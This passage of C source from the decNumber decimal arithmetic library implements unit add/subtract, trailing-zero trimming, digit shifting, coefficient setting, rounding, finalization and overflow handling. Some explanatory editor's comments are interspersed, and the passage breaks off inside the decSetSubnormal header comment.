carry=carry/(DECDPUNMAX+1); continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ *c=(Unit)(carry%(DECDPUNMAX+1)); carry=carry/(DECDPUNMAX+1)-(DECDPUNMAX+1); #endif } /* c */ /* now may have one or other to complete */ /* [pretest to avoid loop setup/shutdown] */ if (c<maxC) for (; c<maxC; c++) { if (a<alsu+alength) { /* still in A */ carry+=*a; a++; } else { /* inside B */ carry+=((eInt)*b)*m; b++; } /* here carry is new Unit of digits; it could be +ve or -ve and */ /* magnitude up to DECDPUNMAX squared */ if ((ueInt)carry<=DECDPUNMAX) { /* fastpath 0-DECDPUNMAX */ *c=(Unit)carry; carry=0; continue; } /* result for this unit is negative or >DECDPUNMAX */ #if DECDPUN==4 /* use divide-by-multiply */ if (carry>=0) { est=(((ueInt)carry>>11)*53687)>>18; *c=(Unit)(carry-est*(DECDPUNMAX+1)); /* remainder */ carry=est; /* likely quotient [79.7%] */ if (*c<DECDPUNMAX+1) continue; /* estimate was correct */ carry++; *c-=DECDPUNMAX+1; continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ est=(((ueInt)carry>>11)*53687)>>18; *c=(Unit)(carry-est*(DECDPUNMAX+1)); carry=est-(DECDPUNMAX+1); /* correctly negative */ if (*c<DECDPUNMAX+1) continue; /* was OK */ carry++; *c-=DECDPUNMAX+1; #elif DECDPUN==3 if (carry>=0) { est=(((ueInt)carry>>3)*16777)>>21; *c=(Unit)(carry-est*(DECDPUNMAX+1)); /* remainder */ carry=est; /* likely quotient [99%] */ if (*c<DECDPUNMAX+1) continue; /* estimate was correct */ 
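/* [Editor's note, added for clarity] 16777/2**24 is slightly */
/* below 1/1000, so for DECDPUN==3 the estimated quotient can be */
/* one less than the true quotient; when the remainder test above */
/* fails, the two statements below bump the quotient and reduce */
/* the remainder accordingly. */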
carry++; *c-=DECDPUNMAX+1; continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ est=(((ueInt)carry>>3)*16777)>>21; *c=(Unit)(carry-est*(DECDPUNMAX+1)); carry=est-(DECDPUNMAX+1); /* correctly negative */ if (*c<DECDPUNMAX+1) continue; /* was OK */ carry++; *c-=DECDPUNMAX+1; #elif DECDPUN<=2 if (carry>=0) { est=QUOT10(carry, DECDPUN); *c=(Unit)(carry-est*(DECDPUNMAX+1)); /* remainder */ carry=est; /* quotient */ continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ est=QUOT10(carry, DECDPUN); *c=(Unit)(carry-est*(DECDPUNMAX+1)); carry=est-(DECDPUNMAX+1); /* correctly negative */ #else if ((ueInt)carry<(DECDPUNMAX+1)*2){ /* fastpath carry 1 */ *c=(Unit)(carry-(DECDPUNMAX+1)); carry=1; continue; } /* remainder operator is undefined if negative, so must test */ if (carry>=0) { *c=(Unit)(carry%(DECDPUNMAX+1)); carry=carry/(DECDPUNMAX+1); continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ *c=(Unit)(carry%(DECDPUNMAX+1)); carry=carry/(DECDPUNMAX+1)-(DECDPUNMAX+1); #endif } /* c */ /* OK, all A and B processed; might still have carry or borrow */ /* return number of Units in the result, negated if a borrow */ if (carry==0) return c-clsu; /* no carry, so no more to do */ if (carry>0) { /* positive carry */ *c=(Unit)carry; /* place as new unit */ c++; /* .. */ return c-clsu; } /* -ve carry: it's a borrow; complement needed */ add=1; /* temporary carry... */ for (c=clsu; c<maxC; c++) { add=DECDPUNMAX+add-*c; if (add<=DECDPUNMAX) { *c=(Unit)add; add=0; } else { *c=0; add=1; } } /* add an extra unit iff it would be non-zero */ #if DECTRACE printf("UAS borrow: add %ld, carry %ld\n", add, carry); #endif if ((add-carry-1)!=0) { *c=(Unit)(add-carry-1); c++; /* interesting, include it */ } return clsu-c; /* -ve result indicates borrowed */ } /* decUnitAddSub */ /* ------------------------------------------------------------------ */ /* decTrim -- trim trailing zeros or normalize */ /* */ /* dn is the number to trim or normalize */ /* set is the context to use to check for clamp */ /* all is 1 to remove all trailing zeros, 0 for just fraction ones */ /* dropped returns the number of discarded trailing zeros */ /* returns dn */ /* */ /* If clamp is set in the context then the number of zeros trimmed */ /* may be limited if the exponent is high. */ /* All fields are updated as required. This is a utility operation, */ /* so special values are unchanged and no error is possible. */ /* ------------------------------------------------------------------ */ static decNumber * decTrim(decNumber *dn, decContext *set, Flag all, Int *dropped) { Int d, exp; /* work */ uInt cut; /* .. */ Unit *up; /* -> current Unit */ #if DECCHECK if (decCheckOperands(dn, DECUNUSED, DECUNUSED, DECUNCONT)) return dn; #endif *dropped=0; /* assume no zeros dropped */ if ((dn->bits & DECSPECIAL) /* fast exit if special .. */ || (*dn->lsu & 0x01)) return dn; /* .. or odd */ if (ISZERO(dn)) { /* .. 
or 0 */ dn->exponent=0; /* (sign is preserved) */ return dn; } /* have a finite number which is even */ exp=dn->exponent; cut=1; /* digit (1-DECDPUN) in Unit */ up=dn->lsu; /* -> current Unit */ for (d=0; d<dn->digits-1; d++) { /* [don't strip the final digit] */ /* slice by powers */ #if DECDPUN<=4 uInt quot=QUOT10(*up, cut); if ((*up-quot*powers[cut])!=0) break; /* found non-0 digit */ #else if (*up%powers[cut]!=0) break; /* found non-0 digit */ #endif /* have a trailing 0 */ if (!all) { /* trimming */ /* [if exp>0 then all trailing 0s are significant for trim] */ if (exp<=0) { /* if digit might be significant */ if (exp==0) break; /* then quit */ exp++; /* next digit might be significant */ } } cut++; /* next power */ if (cut>DECDPUN) { /* need new Unit */ up++; cut=1; } } /* d */ if (d==0) return dn; /* none to drop */ /* may need to limit drop if clamping */ if (set->clamp) { Int maxd=set->emax-set->digits+1-dn->exponent; if (maxd<=0) return dn; /* nothing possible */ if (d>maxd) d=maxd; } /* effect the drop */ decShiftToLeast(dn->lsu, D2U(dn->digits), d); dn->exponent+=d; /* maintain numerical value */ dn->digits-=d; /* new length */ *dropped=d; /* report the count */ return dn; } /* decTrim */ /* ------------------------------------------------------------------ */ /* decReverse -- reverse a Unit array in place */ /* */ /* ulo is the start of the array */ /* uhi is the end of the array (highest Unit to include) */ /* */ /* The units ulo through uhi are reversed in place (if the number */ /* of units is odd, the middle one is untouched). Note that the */ /* digit(s) in each unit are unaffected. */ /* ------------------------------------------------------------------ */ static void decReverse(Unit *ulo, Unit *uhi) { Unit temp; for (; ulo<uhi; ulo++, uhi--) { temp=*ulo; *ulo=*uhi; *uhi=temp; } return; } /* decReverse */ /* ------------------------------------------------------------------ */ /* decShiftToMost -- shift digits in array towards most significant */ /* */ /* uar is the array */ /* digits is the count of digits in use in the array */ /* shift is the number of zeros to pad with (least significant); */ /* it must be zero or positive */ /* */ /* returns the new length of the integer in the array, in digits */ /* */ /* No overflow is permitted (that is, the uar array must be known to */ /* be large enough to hold the result, after shifting). 
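*/
/* [Editor's illustrative note -- not part of the original source] */
/* For example, an array holding 123 (digits=3) shifted with */
/* shift=2 holds 12300 afterwards and the function returns 5; the */
/* caller must already have ensured that enough Units are present */
/* in uar for the five-digit result. */
/*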
*/
/* ------------------------------------------------------------------ */
static Int decShiftToMost(Unit *uar, Int digits, Int shift) {
  Unit *target, *source, *first;    /* work */
  Int cut;                          /* odd 0's to add */
  uInt next;                        /* work */

  if (shift==0) return digits;      /* [fastpath] nothing to do */
  if ((digits+shift)<=DECDPUN) {    /* [fastpath] single-unit case */
    *uar=(Unit)(*uar*powers[shift]);
    return digits+shift;
    }

  next=0;                           /* all paths */
  source=uar+D2U(digits)-1;         /* where msu comes from */
  target=source+D2U(shift);         /* where upper part of first cut goes */
  cut=DECDPUN-MSUDIGITS(shift);     /* where to slice */
  if (cut==0) {                     /* unit-boundary case */
    for (; source>=uar; source--, target--) *target=*source;
    }
   else {
    first=uar+D2U(digits+shift)-1;  /* where msu of source will end up */
    for (; source>=uar; source--, target--) {
      /* split the source Unit and accumulate remainder for next */
      #if DECDPUN<=4
        uInt quot=QUOT10(*source, cut);
        uInt rem=*source-quot*powers[cut];
        next+=quot;
      #else
        uInt rem=*source%powers[cut];
        next+=*source/powers[cut];
      #endif
      if (target<=first) *target=(Unit)next;  /* write to target iff valid */
      next=rem*powers[DECDPUN-cut];  /* save remainder for next Unit */
      }
    } /* shift-move */

  /* propagate any partial unit to one below and clear the rest */
  for (; target>=uar; target--) {
    *target=(Unit)next;
    next=0;
    }
  return digits+shift;
  } /* decShiftToMost */

/* ------------------------------------------------------------------ */
/* decShiftToLeast -- shift digits in array towards least significant */
/* */
/* uar is the array */
/* units is length of the array, in units */
/* shift is the number of digits to remove from the lsu end; it */
/* must be zero or positive and <= units*DECDPUN. */
/* */
/* returns the new length of the integer in the array, in units */
/* */
/* Removed digits are discarded (lost). Units not required to hold */
/* the final result are unchanged. */
/* ------------------------------------------------------------------ */
static Int decShiftToLeast(Unit *uar, Int units, Int shift) {
  Unit *target, *up;                /* work */
  Int cut, count;                   /* work */
  Int quot, rem;                    /* for division */

  if (shift==0) return units;       /* [fastpath] nothing to do */
  if (shift==units*DECDPUN) {       /* [fastpath] little to do */
    *uar=0;                         /* all digits cleared gives zero */
    return 1;                       /* leaves just the one */
    }

  target=uar;                       /* both paths */
  cut=MSUDIGITS(shift);
  if (cut==DECDPUN) {               /* unit-boundary case; easy */
    up=uar+D2U(shift);
    for (; up<uar+units; target++, up++) *target=*up;
    return target-uar;
    }

  /* messier */
  up=uar+D2U(shift-cut);            /* source; correct to whole Units */
  count=units*DECDPUN-shift;        /* the maximum new length */
  #if DECDPUN<=4
    quot=QUOT10(*up, cut);
  #else
    quot=*up/powers[cut];
  #endif
  for (; ; target++) {
    *target=(Unit)quot;
    count-=(DECDPUN-cut);
    if (count<=0) break;
    up++;
    quot=*up;
    #if DECDPUN<=4
      quot=QUOT10(quot, cut);
      rem=*up-quot*powers[cut];
    #else
      rem=quot%powers[cut];
      quot=quot/powers[cut];
    #endif
    *target=(Unit)(*target+rem*powers[DECDPUN-cut]);
    count-=cut;
    if (count<=0) break;
    }
  return target-uar+1;
  } /* decShiftToLeast */

#if DECSUBSET
/* ------------------------------------------------------------------ */
/* decRoundOperand -- round an operand [used for subset only] */
/* */
/* dn is the number to round (dn->digits is > set->digits) */
/* set is the relevant context */
/* status is the status accumulator */
/* */
/* returns an allocated decNumber with the rounded result. */
/* */
/* lostDigits and other status may be set by this.
*/ /* */ /* Since the input is an operand, it must not be modified. */ /* Instead, return an allocated decNumber, rounded as required. */ /* It is the caller's responsibility to free the allocated storage. */ /* */ /* If no storage is available then the result cannot be used, so NULL */ /* is returned. */ /* ------------------------------------------------------------------ */ static decNumber *decRoundOperand(const decNumber *dn, decContext *set, uInt *status) { decNumber *res; /* result structure */ uInt newstatus=0; /* status from round */ Int residue=0; /* rounding accumulator */ /* Allocate storage for the returned decNumber, big enough for the */ /* length specified by the context */ res=(decNumber *)malloc(sizeof(decNumber) +(D2U(set->digits)-1)*sizeof(Unit)); if (res==NULL) { *status|=DEC_Insufficient_storage; return NULL; } decCopyFit(res, dn, set, &residue, &newstatus); decApplyRound(res, set, residue, &newstatus); /* If that set Inexact then "lost digits" is raised... */ if (newstatus & DEC_Inexact) newstatus|=DEC_Lost_digits; *status|=newstatus; return res; } /* decRoundOperand */ #endif /* ------------------------------------------------------------------ */ /* decCopyFit -- copy a number, truncating the coefficient if needed */ /* */ /* dest is the target decNumber */ /* src is the source decNumber */ /* set is the context [used for length (digits) and rounding mode] */ /* residue is the residue accumulator */ /* status contains the current status to be updated */ /* */ /* (dest==src is allowed and will be a no-op if fits) */ /* All fields are updated as required. */ /* ------------------------------------------------------------------ */ static void decCopyFit(decNumber *dest, const decNumber *src, decContext *set, Int *residue, uInt *status) { dest->bits=src->bits; dest->exponent=src->exponent; decSetCoeff(dest, set, src->lsu, src->digits, residue, status); } /* decCopyFit */ /* ------------------------------------------------------------------ */ /* decSetCoeff -- set the coefficient of a number */ /* */ /* dn is the number whose coefficient array is to be set. */ /* It must have space for set->digits digits */ /* set is the context [for size] */ /* lsu -> lsu of the source coefficient [may be dn->lsu] */ /* len is digits in the source coefficient [may be dn->digits] */ /* residue is the residue accumulator. This has values as in */ /* decApplyRound, and will be unchanged unless the */ /* target size is less than len. In this case, the */ /* coefficient is truncated and the residue is updated to */ /* reflect the previous residue and the dropped digits. */ /* status is the status accumulator, as usual */ /* */ /* The coefficient may already be in the number, or it can be an */ /* external intermediate array. If it is in the number, lsu must == */ /* dn->lsu and len must == dn->digits. */ /* */ /* Note that the coefficient length (len) may be < set->digits, and */ /* in this case this merely copies the coefficient (or is a no-op */ /* if dn->lsu==lsu). */ /* */ /* Note also that (only internally, from decQuantizeOp and */ /* decSetSubnormal) the value of set->digits may be less than one, */ /* indicating a round to left. This routine handles that case */ /* correctly; caller ensures space. */ /* */ /* dn->digits, dn->lsu (and as required), and dn->exponent are */ /* updated as necessary. dn->bits (sign) is unchanged. */ /* */ /* DEC_Rounded status is set if any digits are discarded. 
*/ /* DEC_Inexact status is set if any non-zero digits are discarded, or */ /* incoming residue was non-0 (implies rounded) */ /* ------------------------------------------------------------------ */ /* mapping array: maps 0-9 to canonical residues, so that a residue */ /* can be adjusted in the range [-1, +1] and achieve correct rounding */ /* 0 1 2 3 4 5 6 7 8 9 */ static const uByte resmap[10]={0, 3, 3, 3, 3, 5, 7, 7, 7, 7}; static void decSetCoeff(decNumber *dn, decContext *set, const Unit *lsu, Int len, Int *residue, uInt *status) { Int discard; /* number of digits to discard */ uInt cut; /* cut point in Unit */ const Unit *up; /* work */ Unit *target; /* .. */ Int count; /* .. */ #if DECDPUN<=4 uInt temp; /* .. */ #endif discard=len-set->digits; /* digits to discard */ if (discard<=0) { /* no digits are being discarded */ if (dn->lsu!=lsu) { /* copy needed */ /* copy the coefficient array to the result number; no shift needed */ count=len; /* avoids D2U */ up=lsu; for (target=dn->lsu; count>0; target++, up++, count-=DECDPUN) *target=*up; dn->digits=len; /* set the new length */ } /* dn->exponent and residue are unchanged, record any inexactitude */ if (*residue!=0) *status|=(DEC_Inexact | DEC_Rounded); return; } /* some digits must be discarded ... */ dn->exponent+=discard; /* maintain numerical value */ *status|=DEC_Rounded; /* accumulate Rounded status */ if (*residue>1) *residue=1; /* previous residue now to right, so reduce */ if (discard>len) { /* everything, +1, is being discarded */ /* guard digit is 0 */ /* residue is all the number [NB could be all 0s] */ if (*residue<=0) { /* not already positive */ count=len; /* avoids D2U */ for (up=lsu; count>0; up++, count-=DECDPUN) if (*up!=0) { /* found non-0 */ *residue=1; break; /* no need to check any others */ } } if (*residue!=0) *status|=DEC_Inexact; /* record inexactitude */ *dn->lsu=0; /* coefficient will now be 0 */ dn->digits=1; /* .. */ return; } /* total discard */ /* partial discard [most common case] */ /* here, at least the first (most significant) discarded digit exists */ /* spin up the number, noting residue during the spin, until get to */ /* the Unit with the first discarded digit. When reach it, extract */ /* it and remember its position */ count=0; for (up=lsu;; up++) { count+=DECDPUN; if (count>=discard) break; /* full ones all checked */ if (*up!=0) *residue=1; } /* up */ /* here up -> Unit with first discarded digit */ cut=discard-(count-DECDPUN)-1; if (cut==DECDPUN-1) { /* unit-boundary case (fast) */ Unit half=(Unit)powers[DECDPUN]>>1; /* set residue directly */ if (*up>=half) { if (*up>half) *residue=7; else *residue+=5; /* add sticky bit */ } else { /* <half */ if (*up!=0) *residue=3; /* [else is 0, leave as sticky bit] */ } if (set->digits<=0) { /* special for Quantize/Subnormal :-( */ *dn->lsu=0; /* .. result is 0 */ dn->digits=1; /* .. 
*/ } else { /* shift to least */ count=set->digits; /* now digits to end up with */ dn->digits=count; /* set the new length */ up++; /* move to next */ /* on unit boundary, so shift-down copy loop is simple */ for (target=dn->lsu; count>0; target++, up++, count-=DECDPUN) *target=*up; } } /* unit-boundary case */ else { /* discard digit is in low digit(s), and not top digit */ uInt discard1; /* first discarded digit */ uInt quot, rem; /* for divisions */ if (cut==0) quot=*up; /* is at bottom of unit */ else /* cut>0 */ { /* it's not at bottom of unit */ #if DECDPUN<=4 quot=QUOT10(*up, cut); rem=*up-quot*powers[cut]; #else rem=*up%powers[cut]; quot=*up/powers[cut]; #endif if (rem!=0) *residue=1; } /* discard digit is now at bottom of quot */ #if DECDPUN<=4 temp=(quot*6554)>>16; /* fast /10 */ /* Vowels algorithm here not a win (9 instructions) */ discard1=quot-X10(temp); quot=temp; #else discard1=quot%10; quot=quot/10; #endif /* here, discard1 is the guard digit, and residue is everything */ /* else [use mapping array to accumulate residue safely] */ *residue+=resmap[discard1]; cut++; /* update cut */ /* here: up -> Unit of the array with bottom digit */ /* cut is the division point for each Unit */ /* quot holds the uncut high-order digits for the current unit */ if (set->digits<=0) { /* special for Quantize/Subnormal :-( */ *dn->lsu=0; /* .. result is 0 */ dn->digits=1; /* .. */ } else { /* shift to least needed */ count=set->digits; /* now digits to end up with */ dn->digits=count; /* set the new length */ /* shift-copy the coefficient array to the result number */ for (target=dn->lsu; ; target++) { *target=(Unit)quot; count-=(DECDPUN-cut); if (count<=0) break; up++; quot=*up; #if DECDPUN<=4 quot=QUOT10(quot, cut); rem=*up-quot*powers[cut]; #else rem=quot%powers[cut]; quot=quot/powers[cut]; #endif *target=(Unit)(*target+rem*powers[DECDPUN-cut]); count-=cut; if (count<=0) break; } /* shift-copy loop */ } /* shift to least */ } /* not unit boundary */ if (*residue!=0) *status|=DEC_Inexact; /* record inexactitude */ return; } /* decSetCoeff */ /* ------------------------------------------------------------------ */ /* decApplyRound -- apply pending rounding to a number */ /* */ /* dn is the number, with space for set->digits digits */ /* set is the context [for size and rounding mode] */ /* residue indicates pending rounding, being any accumulated */ /* guard and sticky information. It may be: */ /* 6-9: rounding digit is >5 */ /* 5: rounding digit is exactly half-way */ /* 1-4: rounding digit is <5 and >0 */ /* 0: the coefficient is exact */ /* -1: as 1, but the hidden digits are subtractive, that */ /* is, of the opposite sign to dn. In this case the */ /* coefficient must be non-0. This case occurs when */ /* subtracting a small number (which can be reduced to */ /* a sticky bit); see decAddOp. */ /* status is the status accumulator, as usual */ /* */ /* This routine applies rounding while keeping the length of the */ /* coefficient constant. The exponent and status are unchanged */ /* except if: */ /* */ /* -- the coefficient was increased and is all nines (in which */ /* case Overflow could occur, and is handled directly here so */ /* the caller does not need to re-test for overflow) */ /* */ /* -- the coefficient was decreased and becomes all nines (in which */ /* case Underflow could occur, and is also handled directly). */ /* */ /* All fields in dn are updated as required. 
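*/
/* [Editor's illustrative note -- not part of the original source] */
/* For example, a residue of 5 (exactly half-way) under */
/* DEC_ROUND_HALF_EVEN bumps the coefficient up only when its */
/* least significant digit is odd: rounding 1.25 to two digits */
/* gives 1.2, while 1.35 gives 1.4. A hedged caller-level sketch */
/* using only the public decNumber API (and assuming DECNUMDIGITS */
/* was defined large enough before including decNumber.h): */
/* */
/*   decContext ctx; decNumber a; */
/*   decContextDefault(&ctx, DEC_INIT_BASE); */
/*   ctx.digits=2; ctx.round=DEC_ROUND_HALF_EVEN; */
/*   decNumberFromString(&a, "1.25", &ctx); */
/*   -- a is now 1.2, and DEC_Inexact and DEC_Rounded are set */
/*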
*/ /* */ /* ------------------------------------------------------------------ */ static void decApplyRound(decNumber *dn, decContext *set, Int residue, uInt *status) { Int bump; /* 1 if coefficient needs to be incremented */ /* -1 if coefficient needs to be decremented */ if (residue==0) return; /* nothing to apply */ bump=0; /* assume a smooth ride */ /* now decide whether, and how, to round, depending on mode */ switch (set->round) { case DEC_ROUND_05UP: { /* round zero or five up (for reround) */ /* This is the same as DEC_ROUND_DOWN unless there is a */ /* positive residue and the lsd of dn is 0 or 5, in which case */ /* it is bumped; when residue is <0, the number is therefore */ /* bumped down unless the final digit was 1 or 6 (in which */ /* case it is bumped down and then up -- a no-op) */ Int lsd5=*dn->lsu%5; /* get lsd and quintate */ if (residue<0 && lsd5!=1) bump=-1; else if (residue>0 && lsd5==0) bump=1; /* [bump==1 could be applied directly; use common path for clarity] */ break;} /* r-05 */ case DEC_ROUND_DOWN: { /* no change, except if negative residue */ if (residue<0) bump=-1; break;} /* r-d */ case DEC_ROUND_HALF_DOWN: { if (residue>5) bump=1; break;} /* r-h-d */ case DEC_ROUND_HALF_EVEN: { if (residue>5) bump=1; /* >0.5 goes up */ else if (residue==5) { /* exactly 0.5000... */ /* 0.5 goes up iff [new] lsd is odd */ if (*dn->lsu & 0x01) bump=1; } break;} /* r-h-e */ case DEC_ROUND_HALF_UP: { if (residue>=5) bump=1; break;} /* r-h-u */ case DEC_ROUND_UP: { if (residue>0) bump=1; break;} /* r-u */ case DEC_ROUND_CEILING: { /* same as _UP for positive numbers, and as _DOWN for negatives */ /* [negative residue cannot occur on 0] */ if (decNumberIsNegative(dn)) { if (residue<0) bump=-1; } else { if (residue>0) bump=1; } break;} /* r-c */ case DEC_ROUND_FLOOR: { /* same as _UP for negative numbers, and as _DOWN for positive */ /* [negative residue cannot occur on 0] */ if (!decNumberIsNegative(dn)) { if (residue<0) bump=-1; } else { if (residue>0) bump=1; } break;} /* r-f */ default: { /* e.g., DEC_ROUND_MAX */ *status|=DEC_Invalid_context; #if DECTRACE || (DECCHECK && DECVERB) printf("Unknown rounding mode: %d\n", set->round); #endif break;} } /* switch */ /* now bump the number, up or down, if need be */ if (bump==0) return; /* no action required */ /* Simply use decUnitAddSub unless bumping up and the number is */ /* all nines. In this special case set to 100... explicitly */ /* and adjust the exponent by one (as otherwise could overflow */ /* the array) */ /* Similarly handle all-nines result if bumping down. */ if (bump>0) { Unit *up; /* work */ uInt count=dn->digits; /* digits to be checked */ for (up=dn->lsu; ; up++) { if (count<=DECDPUN) { /* this is the last Unit (the msu) */ if (*up!=powers[count]-1) break; /* not still 9s */ /* here if it, too, is all nines */ *up=(Unit)powers[count-1]; /* here 999 -> 100 etc. */ for (up=up-1; up>=dn->lsu; up--) *up=0; /* others all to 0 */ dn->exponent++; /* and bump exponent */ /* [which, very rarely, could cause Overflow...] */ if ((dn->exponent+dn->digits)>set->emax+1) { decSetOverflow(dn, set, status); } return; /* done */ } /* a full unit to check, with more to come */ if (*up!=DECDPUNMAX) break; /* not still 9s */ count-=DECDPUN; } /* up */ } /* bump>0 */ else { /* -1 */ /* here checking for a pre-bump of 1000... 
(leading 1, all */ /* other digits zero) */ Unit *up, *sup; /* work */ uInt count=dn->digits; /* digits to be checked */ for (up=dn->lsu; ; up++) { if (count<=DECDPUN) { /* this is the last Unit (the msu) */ if (*up!=powers[count-1]) break; /* not 100.. */ /* here if have the 1000... case */ sup=up; /* save msu pointer */ *up=(Unit)powers[count]-1; /* here 100 in msu -> 999 */ /* others all to all-nines, too */ for (up=up-1; up>=dn->lsu; up--) *up=(Unit)powers[DECDPUN]-1; dn->exponent--; /* and bump exponent */ /* iff the number was at the subnormal boundary (exponent=etiny) */ /* then the exponent is now out of range, so it will in fact get */ /* clamped to etiny and the final 9 dropped. */ /* printf(">> emin=%d exp=%d sdig=%d\n", set->emin, */ /* dn->exponent, set->digits); */ if (dn->exponent+1==set->emin-set->digits+1) { if (count==1 && dn->digits==1) *sup=0; /* here 9 -> 0[.9] */ else { *sup=(Unit)powers[count-1]-1; /* here 999.. in msu -> 99.. */ dn->digits--; } dn->exponent++; *status|=DEC_Underflow | DEC_Subnormal | DEC_Inexact | DEC_Rounded; } return; /* done */ } /* a full unit to check, with more to come */ if (*up!=0) break; /* not still 0s */ count-=DECDPUN; } /* up */ } /* bump<0 */ /* Actual bump needed. Do it. */ decUnitAddSub(dn->lsu, D2U(dn->digits), uarrone, 1, 0, dn->lsu, bump); } /* decApplyRound */ #if DECSUBSET /* ------------------------------------------------------------------ */ /* decFinish -- finish processing a number */ /* */ /* dn is the number */ /* set is the context */ /* residue is the rounding accumulator (as in decApplyRound) */ /* status is the accumulator */ /* */ /* This finishes off the current number by: */ /* 1. If not extended: */ /* a. Converting a zero result to clean '0' */ /* b. Reducing positive exponents to 0, if would fit in digits */ /* 2. Checking for overflow and subnormals (always) */ /* Note this is just Finalize when no subset arithmetic. */ /* All fields are updated as required. */ /* ------------------------------------------------------------------ */ static void decFinish(decNumber *dn, decContext *set, Int *residue, uInt *status) { if (!set->extended) { if ISZERO(dn) { /* value is zero */ dn->exponent=0; /* clean exponent .. */ dn->bits=0; /* .. and sign */ return; /* no error possible */ } if (dn->exponent>=0) { /* non-negative exponent */ /* >0; reduce to integer if possible */ if (set->digits >= (dn->exponent+dn->digits)) { dn->digits=decShiftToMost(dn->lsu, dn->digits, dn->exponent); dn->exponent=0; } } } /* !extended */ decFinalize(dn, set, residue, status); } /* decFinish */ #endif /* ------------------------------------------------------------------ */ /* decFinalize -- final check, clamp, and round of a number */ /* */ /* dn is the number */ /* set is the context */ /* residue is the rounding accumulator (as in decApplyRound) */ /* status is the status accumulator */ /* */ /* This finishes off the current number by checking for subnormal */ /* results, applying any pending rounding, checking for overflow, */ /* and applying any clamping. */ /* Underflow and overflow conditions are raised as appropriate. */ /* All fields are updated as required. 
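*/
/* [Editor's illustrative note -- not part of the original source] */
/* For example, with emin=-95 and a 7-digit result, tinyexp is */
/* -95-7+1=-101: a result whose exponent is below that goes */
/* straight to decSetSubnormal, while one exactly at the boundary */
/* takes the subnormal path only if it equals Nmin and a negative */
/* residue is pending. */
/*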
*/ /* ------------------------------------------------------------------ */ static void decFinalize(decNumber *dn, decContext *set, Int *residue, uInt *status) { Int shift; /* shift needed if clamping */ Int tinyexp=set->emin-dn->digits+1; /* precalculate subnormal boundary */ /* Must be careful, here, when checking the exponent as the */ /* adjusted exponent could overflow 31 bits [because it may already */ /* be up to twice the expected]. */ /* First test for subnormal. This must be done before any final */ /* round as the result could be rounded to Nmin or 0. */ if (dn->exponent<=tinyexp) { /* prefilter */ Int comp; decNumber nmin; /* A very nasty case here is dn == Nmin and residue<0 */ if (dn->exponent<tinyexp) { /* Go handle subnormals; this will apply round if needed. */ decSetSubnormal(dn, set, residue, status); return; } /* Equals case: only subnormal if dn=Nmin and negative residue */ decNumberZero(&nmin); nmin.lsu[0]=1; nmin.exponent=set->emin; comp=decCompare(dn, &nmin, 1); /* (signless compare) */ if (comp==BADINT) { /* oops */ *status|=DEC_Insufficient_storage; /* abandon... */ return; } if (*residue<0 && comp==0) { /* neg residue and dn==Nmin */ decApplyRound(dn, set, *residue, status); /* might force down */ decSetSubnormal(dn, set, residue, status); return; } } /* now apply any pending round (this could raise overflow). */ if (*residue!=0) decApplyRound(dn, set, *residue, status); /* Check for overflow [redundant in the 'rare' case] or clamp */ if (dn->exponent<=set->emax-set->digits+1) return; /* neither needed */ /* here when might have an overflow or clamp to do */ if (dn->exponent>set->emax-dn->digits+1) { /* too big */ decSetOverflow(dn, set, status); return; } /* here when the result is normal but in clamp range */ if (!set->clamp) return; /* here when need to apply the IEEE exponent clamp (fold-down) */ shift=dn->exponent-(set->emax-set->digits+1); /* shift coefficient (if non-zero) */ if (!ISZERO(dn)) { dn->digits=decShiftToMost(dn->lsu, dn->digits, shift); } dn->exponent-=shift; /* adjust the exponent to match */ *status|=DEC_Clamped; /* and record the dirty deed */ return; } /* decFinalize */ /* ------------------------------------------------------------------ */ /* decSetOverflow -- set number to proper overflow value */ /* */ /* dn is the number (used for sign [only] and result) */ /* set is the context [used for the rounding mode, etc.] */ /* status contains the current status to be updated */ /* */ /* This sets the sign of a number and sets its value to either */ /* Infinity or the maximum finite value, depending on the sign of */ /* dn and the rounding mode, following IEEE 854 rules. 
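*/
/* [Editor's illustrative note -- not part of the original source] */
/* For example, with digits=7 and emax=96, a positive overflow */
/* under DEC_ROUND_DOWN produces +Nmax (9.999999E+96) rather than */
/* +Infinity; under DEC_ROUND_CEILING the same overflow produces */
/* +Infinity, while a negative overflow produces -Nmax. */
/*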
*/ /* ------------------------------------------------------------------ */ static void decSetOverflow(decNumber *dn, decContext *set, uInt *status) { Flag needmax=0; /* result is maximum finite value */ uByte sign=dn->bits&DECNEG; /* clean and save sign bit */ if (ISZERO(dn)) { /* zero does not overflow magnitude */ Int emax=set->emax; /* limit value */ if (set->clamp) emax-=set->digits-1; /* lower if clamping */ if (dn->exponent>emax) { /* clamp required */ dn->exponent=emax; *status|=DEC_Clamped; } return; } decNumberZero(dn); switch (set->round) { case DEC_ROUND_DOWN: { needmax=1; /* never Infinity */ break;} /* r-d */ case DEC_ROUND_05UP: { needmax=1; /* never Infinity */ break;} /* r-05 */ case DEC_ROUND_CEILING: { if (sign) needmax=1; /* Infinity if non-negative */ break;} /* r-c */ case DEC_ROUND_FLOOR: { if (!sign) needmax=1; /* Infinity if negative */ break;} /* r-f */ default: break; /* Infinity in all other cases */ } if (needmax) { decSetMaxValue(dn, set); dn->bits=sign; /* set sign */ } else dn->bits=sign|DECINF; /* Value is +/-Infinity */ *status|=DEC_Overflow | DEC_Inexact | DEC_Rounded; } /* decSetOverflow */ /* ------------------------------------------------------------------ */ /* decSetMaxValue -- set number to +Nmax (maximum normal value) */ /* */ /* dn is the number to set */ /* set is the context [used for digits and emax] */ /* */ /* This sets the number to the maximum positive value. */ /* ------------------------------------------------------------------ */ static void decSetMaxValue(decNumber *dn, decContext *set) { Unit *up; /* work */ Int count=set->digits; /* nines to add */ dn->digits=count; /* fill in all nines to set maximum value */ for (up=dn->lsu; ; up++) { if (count>DECDPUN) *up=DECDPUNMAX; /* unit full o'nines */ else { /* this is the msu */ *up=(Unit)(powers[count]-1); break; } count-=DECDPUN; /* filled those digits */ } /* up */ dn->bits=0; /* + sign */ dn->exponent=set->emax-set->digits+1; } /* decSetMaxValue */ /* ------------------------------------------------------------------ */ /* decSetSubnormal -- process value whose exponent is <Emin */ /* */ /* dn is the number (used as input as well as output; it may have */ /* an allowed subnormal value, which 